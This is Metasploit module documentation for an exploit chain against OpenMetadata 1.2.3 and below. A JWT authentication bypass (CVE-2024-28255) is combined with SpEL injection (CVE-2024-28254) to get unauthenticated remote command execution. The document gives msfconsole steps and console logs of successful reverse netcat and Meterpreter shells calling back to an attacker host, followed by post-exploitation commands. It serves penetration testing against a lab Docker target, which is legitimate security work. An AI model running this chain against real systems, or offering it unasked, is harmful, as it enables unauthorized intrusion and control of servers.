## Vulnerable Application

OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository,
in-depth lineage, and seamless team collaboration.
This module chains two vulnerabilities that exist in the OpenMetadata application.
The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication
using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints
that does not require authentication.
Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the
excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the
authentication mechanism and reach any arbitrary endpoint.
By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for
arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able
to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication.

OpenMetadata versions `1.2.3` and below are vulnerable.

The following releases were tested.
* OpenMetadata 1.2.3 on Docker

## Installation steps to install the OpenMedata running on Docker
* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment).
* Please ensure that you download version 1.2.3 or below.
* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`.

You are now ready to test the module.

## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ]  `set lhost <attacker-ip>`
- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings

## Options
No specific options

## Scenarios
```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info

       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
     Module: exploit/linux/http/openmetadata_auth_bypass_rce
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-15

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Alvaro Muñoz alias pwntester (https://github.com/pwntester)

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                        html
  RPORT      8585             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path of the OpenMetadata web application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  OpenMetadata is a unified platform for discovery, observability, and governance powered
  by a central metadata repository, in-depth lineage, and seamless team collaboration.
  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
  to make any path contain any arbitrary strings that will match the excluded endpoint condition
  and therefore will be processed with no JWT validation allowing an attacker to bypass the
  authentication mechanism and reach any arbitrary endpoint.
  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
  authentication.
  OpenMetadata versions `1.2.3` and below are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
A  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/


View the full module info with the info -d command.
```
### OpenMetadata 1.2.3 Automatic - cmd/unix/reverse_netcat_gaping
```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
rhosts => 192.168.201.42
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
[+] The target is vulnerable. Version 1.2.3
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000

id
uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata)
pwd
/opt/openmetadata
uname -a
Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
```
### OpenMetadata 1.2.3 Automatic - cmd/linux/http/x64/meterpreter/reverse_tcp
```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
[+] The target is vulnerable. Version 1.2.3
[*] Executing Automatic for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 192.168.201.42
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:50599) at 2024-07-31 14:31:37 +0000

meterpreter > getuid
Server username: openmetadata
meterpreter > sysinfo
Computer     : 172.16.240.4
OS           :  (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/opt/openmetadata
meterpreter >
```
## Limitations
No limitations.
